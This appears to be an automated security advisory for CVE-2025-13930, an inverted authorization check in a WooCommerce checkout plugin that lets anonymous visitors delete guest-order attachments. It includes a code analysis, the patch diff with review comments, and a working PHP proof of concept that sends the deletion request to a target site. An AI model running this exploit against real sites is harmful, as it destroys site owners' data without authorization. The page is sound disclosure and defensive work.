Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-13930: Checkout Field Manager (Checkout Manager) for WooCommerce <= 7.8.5 – Missing Authorization to Unauthenticated Arbitrary Attachment Deletion (woocommerce-checkout-manager)

Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 7.8.5
Patched Version: 7.8.6
Disclosed: February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13930:
This vulnerability is an authorization bypass in the Checkout Field Manager for WooCommerce WordPress plugin, affecting versions up to and including 7.8.5. The flaw allows unauthenticated attackers to delete attachments associated with guest orders, resulting in a CVSS score of 5.3.

Atomic Edge research identified the root cause in the `woocommerce-checkout-manager/lib/class-upload.php` file, specifically within the `wooccm_order_attachment_delete` function. The function's authorization logic for guest orders was flawed. The variable `$is_user_logged` was incorrectly set to `0 === $current_user->ID` on line 128, which evaluated to `true` for unauthenticated users (ID 0). This inverted flag skipped the session-email check entirely, and the following ownership check then passed as well, because a guest order's user ID is also 0 and therefore equals the anonymous user's ID. The only validation that could have applied compared the order's billing email to a session email, which an attacker could manipulate or bypass.

Exploitation requires an attacker to send a crafted request to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The request must include the action parameter set to `wooccm_order_attachment_delete`, a valid `wooccm_upload` nonce, and the `attachtoremove` parameter containing the target attachment ID. The nonce is publicly exposed in the order view page source. No authentication or order key is required in the vulnerable version, allowing complete bypass of ownership validation.

The patch, applied in version 7.8.6, corrects the login check by setting `$is_user_logged = 0 !== $current_user->ID`. For guest users, it now mandates validation of an `order_key` parameter against the order’s actual key using `hash_equals`. It also adds stricter session email validation. The `order_key` parameter is now included in the file upload interface HTML within `templates/order/order-upload-files.php`. These changes ensure that only users who possess the unique order key, which is not publicly exposed like the nonce, can authorize deletions for guest orders.
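The two authorization paths described above, as an added PHP illustration that is not the plugin's own code: the `$order` array and the `authorize_delete_*` functions are constructed stand-ins for the handler's logic, showing why an anonymous request passed before 7.8.6 and why it is rejected after.

```php
<?php
declare(strict_types=1);
// Added illustration, not the plugin's own code: the guest-order authorization
// decision of wooccm_order_attachment_delete before and after 7.8.6, modelled
// as pure functions. $order is a constructed array standing in for the
// WC_Order accessors the handler calls; the other arguments are hypothetical.

// <= 7.8.5: the login flag is inverted, so an unauthenticated user (ID 0) is
// treated as logged in, skips the session-email check, and then satisfies the
// ownership check because a guest order also carries user_id 0.
function authorize_delete_vulnerable(int $user_id, array $order, string $session_email, bool $has_caps): bool
{
    $is_user_logged = 0 === $user_id;                      // inverted check
    $email_ok       = $order['billing_email'] === $session_email;
    if ( ! $is_user_logged && ! $email_ok ) {
        return false;                                      // "You must be logged in."
    }
    if ( ! $has_caps && $user_id !== $order['user_id'] ) {
        return false;                                      // "This is not your order."
    }
    return true;
}

// 7.8.6: guests must present the order key (compared in constant time) and a
// session email matching the order; logged-in users need ownership or a capability.
function authorize_delete_patched(int $user_id, array $order, string $session_email, string $request_key, bool $has_caps): bool
{
    $is_user_logged = 0 !== $user_id;
    if ( ! $is_user_logged ) {
        if ( '' === $request_key || ! hash_equals( $order['order_key'], $request_key ) ) {
            return false;                                  // "Invalid order key."
        }
        if ( '' === $session_email || $order['billing_email'] !== $session_email ) {
            return false;                                  // "Email mismatch."
        }
        return true;
    }
    return $has_caps || $user_id === $order['user_id'];
}

// Constructed guest order; the first two requests below carry no session and no key.
$guest_order = [ 'user_id' => 0, 'billing_email' => 'buyer@example.com', 'order_key' => 'wc_order_EXAMPLEKEY' ];
$verdict     = fn( bool $ok ): string => $ok ? 'allowed' : 'denied';

echo 'vulnerable, anonymous request:      ' . $verdict( authorize_delete_vulnerable( 0, $guest_order, '', false ) ) . PHP_EOL;
echo 'patched, anonymous request:         ' . $verdict( authorize_delete_patched( 0, $guest_order, '', '', false ) ) . PHP_EOL;
echo 'patched, key + matching session:    ' . $verdict( authorize_delete_patched( 0, $guest_order, 'buyer@example.com', 'wc_order_EXAMPLEKEY', false ) ) . PHP_EOL;
echo 'patched, other logged-in customer:  ' . $verdict( authorize_delete_patched( 42, $guest_order, '', '', false ) ) . PHP_EOL;
```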

Successful exploitation allows an unauthenticated attacker to delete arbitrary media library attachments linked to guest orders. This can lead to data loss, disruption of order fulfillment processes, and potential reputational damage for the site owner. The vulnerability does not grant file upload or remote code execution capabilities, but it enables unauthorized destruction of site assets.

Differential between vulnerable and patched code

Code Diff
--- a/woocommerce-checkout-manager/build/frontend/js/index.asset.php
+++ b/woocommerce-checkout-manager/build/frontend/js/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('jquery', 'selectWoo'), 'version' => 'a0c35895fe8242798dc8');
+<?php return array('dependencies' => array('jquery', 'selectWoo'), 'version' => '4ef2613ca06cc64d74c5');
--- a/woocommerce-checkout-manager/jetpack_vendor/i18n-map.php
+++ b/woocommerce-checkout-manager/jetpack_vendor/i18n-map.php
@@ -6,7 +6,7 @@
   'packages' => array(
     'jetpack-assets' => array(
       'path' => 'jetpack_vendor/automattic/jetpack-assets',
-      'ver' => '4.3.18',
+      'ver' => '4.3.19',
     ),
     'wp-dashboard-widget-news' => array(
       'path' => 'jetpack_vendor/quadlayers/wp-dashboard-widget-news',
--- a/woocommerce-checkout-manager/lib/class-upload.php
+++ b/woocommerce-checkout-manager/lib/class-upload.php
@@ -126,25 +126,36 @@

 					$session_handler = WC()->session;

-					$is_user_logged = 0 === $current_user->ID;
+					// Security Fix: CVE-2025-13930 - Fixed inverted login check
+					$is_user_logged = 0 !== $current_user->ID;

-					$order_email            = $order->get_billing_email();
-					$session_customer_email = $session_handler->get( 'customer' )['email'];
-
-					$is_session_email_equal_order_email = $order_email === $session_customer_email;
-
-					if ( ! $is_user_logged && ! $is_session_email_equal_order_email ) {
-						wp_send_json_error( esc_html__( 'You must be logged in.', 'woocommerce-checkout-manager' ) );
-					}
-
-					$order_user_id = $order->get_user_id();
-
-					$user_has_capabilities = current_user_can( 'administrator' ) || current_user_can( 'edit_others_shop_orders' ) || current_user_can( 'delete_others_shop_orders' );
-
-					$is_current_user_order_equal_user_id = $current_user->ID === $order_user_id;
-
-					if ( ! $user_has_capabilities && ! $is_current_user_order_equal_user_id ) {
-						wp_send_json_error( esc_html__( 'This is not your order.', 'woocommerce-checkout-manager' ) );
+					// For guest orders, require order key validation
+					if ( ! $is_user_logged ) {
+						// Validate order key for guest orders
+						$order_key = isset( $_REQUEST['order_key'] ) ? wc_clean( wp_unslash( $_REQUEST['order_key'] ) ) : '';
+
+						if ( empty( $order_key ) || ! hash_equals( $order->get_order_key(), $order_key ) ) {
+							wp_send_json_error( esc_html__( 'Invalid order key.', 'woocommerce-checkout-manager' ) );
+						}
+
+						// Verify session email matches order email
+						$session_customer       = $session_handler ? $session_handler->get( 'customer' ) : array();
+						$session_customer_email = isset( $session_customer['email'] ) ? $session_customer['email'] : '';
+						$order_email            = $order->get_billing_email();
+
+						if ( empty( $session_customer_email ) || $order_email !== $session_customer_email ) {
+							wp_send_json_error( esc_html__( 'Email mismatch.', 'woocommerce-checkout-manager' ) );
+						}
+					} else {
+						// For logged-in users, verify ownership or capabilities
+						$order_user_id         = $order->get_user_id();
+						$user_has_capabilities = current_user_can( 'administrator' )
+							|| current_user_can( 'edit_others_shop_orders' )
+							|| current_user_can( 'delete_others_shop_orders' );
+
+						if ( ! $user_has_capabilities && $current_user->ID !== $order_user_id ) {
+							wp_send_json_error( esc_html__( 'This is not your order.', 'woocommerce-checkout-manager' ) );
+						}
 					}

 					wp_delete_attachment( $attachtoremove );
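Review bot: nothing in this hunk ties `$attachtoremove` to `$order` before the unchanged `wp_delete_attachment( $attachtoremove );` at the end of the hunk; the new guest branch proves the caller may act on `$order`, so unless an earlier part of the function verifies that the attachment ID is one of that order's own uploads, add that check and reject IDs that are not linked to the order. A smaller point: the guest branch reads the key via `$_REQUEST['order_key']`, which also accepts query-string input, so `$_POST` would match the AJAX action more tightly.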
--- a/woocommerce-checkout-manager/templates/order/order-upload-files.php
+++ b/woocommerce-checkout-manager/templates/order/order-upload-files.php
@@ -64,7 +64,7 @@
 			<span><?php esc_html_e( 'Upload Files', 'woocommerce-checkout-manager' ); ?></span>
 			<input data-order_id="<?php echo esc_attr( $order->get_id() ); ?>" data-order_key="<?php echo esc_attr( $order->get_order_key() ); ?>" type="file" name="wooccm_order_attachment_upload" id="wooccm_order_attachment_upload" multiple />
 		</a>
-		<input type="button" id="wooccm_order_attachment_update" class="button button-secondary" value="<?php esc_html_e( 'Save Changes', 'woocommerce-checkout-manager' ); ?>" disabled="disabled">
+		<input type="button" id="wooccm_order_attachment_update" data-order_key="<?php echo esc_attr( $order->get_order_key() ); ?>" class="button button-secondary" value="<?php esc_html_e( 'Save Changes', 'woocommerce-checkout-manager' ); ?>" disabled="disabled">
 		<span class="wooccm_upload_results"></span>
 	</p>
 </div>
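Review bot: the `<input type="file">` on the context line two lines above already carries `data-order_key` with the same `$order->get_order_key()` value, so the new attribute on `#wooccm_order_attachment_update` duplicates it; document which element the frontend script reads the key from, or render it once and let the script pick it up from there. Since the key now appears in the markup, this template should only be rendered to a viewer who has already proved possession of the key, never in a context a logged-out visitor can reach without it.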
--- a/woocommerce-checkout-manager/vendor/composer/installed.php
+++ b/woocommerce-checkout-manager/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'quadlayers/woocommerce-checkout-manager',
-        'pretty_version' => 'v7.8.5',
-        'version' => '7.8.5.0',
-        'reference' => 'bb513c27f1cf5e0addec497f6a40af52293154f9',
+        'pretty_version' => 'v7.8.6',
+        'version' => '7.8.6.0',
+        'reference' => 'b350851e8af4e6e862fde8d61718565f9f349efe',
         'type' => 'project',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -11,9 +11,9 @@
     ),
     'versions' => array(
         'automattic/jetpack-assets' => array(
-            'pretty_version' => 'v4.3.18',
-            'version' => '4.3.18.0',
-            'reference' => '925626ee45a4c9216fb2fe93016a18927da7fafc',
+            'pretty_version' => 'v4.3.19',
+            'version' => '4.3.19.0',
+            'reference' => '8ea6849ac53ca145f9196cb1e9a27c1a4a442330',
             'type' => 'jetpack-library',
             'install_path' => __DIR__ . '/../../jetpack_vendor/automattic/jetpack-assets',
             'aliases' => array(),
@@ -56,9 +56,9 @@
             'dev_requirement' => false,
         ),
         'quadlayers/woocommerce-checkout-manager' => array(
-            'pretty_version' => 'v7.8.5',
-            'version' => '7.8.5.0',
-            'reference' => 'bb513c27f1cf5e0addec497f6a40af52293154f9',
+            'pretty_version' => 'v7.8.6',
+            'version' => '7.8.6.0',
+            'reference' => 'b350851e8af4e6e862fde8d61718565f9f349efe',
             'type' => 'project',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
--- a/woocommerce-checkout-manager/woocommerce-checkout-manager.php
+++ b/woocommerce-checkout-manager/woocommerce-checkout-manager.php
@@ -4,7 +4,7 @@
  * Plugin Name:             WooCommerce Checkout Manager
  * Plugin URI:              https://quadlayers.com/products/woocommerce-checkout-manager/
  * Description:             Manage and customize WooCommerce Checkout fields (Add, Edit, Delete or re-order fields).
- * Version:                 7.8.5
+ * Version:                 7.8.6
  * Author:                  QuadLayers
  * Author URI:              https://quadlayers.com
  * License:                 GPLv3
@@ -25,7 +25,7 @@
  * Definition globals varibles
  */
 define( 'WOOCCM_PLUGIN_NAME', 'WooCommerce Checkout Manager' );
-define( 'WOOCCM_PLUGIN_VERSION', '7.8.5' );
+define( 'WOOCCM_PLUGIN_VERSION', '7.8.6' );
 define( 'WOOCCM_PLUGIN_FILE', __FILE__ );
 define( 'WOOCCM_PLUGIN_DIR', __DIR__ . DIRECTORY_SEPARATOR );
 define( 'WOOCCM_PLUGIN_BASENAME', plugin_basename( __FILE__ ) );

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13930 - Checkout Field Manager (Checkout Manager) for WooCommerce <= 7.8.5 - Missing Authorization to Unauthenticated Arbitrary Attachment Deletion

// CONFIGURATION
$target_url = 'https://vulnerable-site.com';
$nonce = 'abc123def456'; // Extract from page source: wooccm_upload nonce
$attachment_id = 789; // ID of the attachment to delete

// Build the POST body for the WordPress AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = array(
    'action' => 'wooccm_order_attachment_delete',
    'wooccm_upload' => $nonce,
    'attachtoremove' => $attachment_id,
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // For testing only

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output result. wp_send_json_success() answers {"success":true,...} and
// wp_send_json_error() answers {"success":false,...}, both with HTTP 200,
// so decode the JSON instead of searching for the substring "success".
$json = json_decode((string) $response, true);
if ($http_code == 200 && is_array($json) && !empty($json['success'])) {
    echo "[SUCCESS] Attachment $attachment_id likely deleted.\n";
    echo "Response: $response\n";
} else {
    echo "[FAILED] Request returned HTTP $http_code.\n";
    echo "Response: $response\n";
}
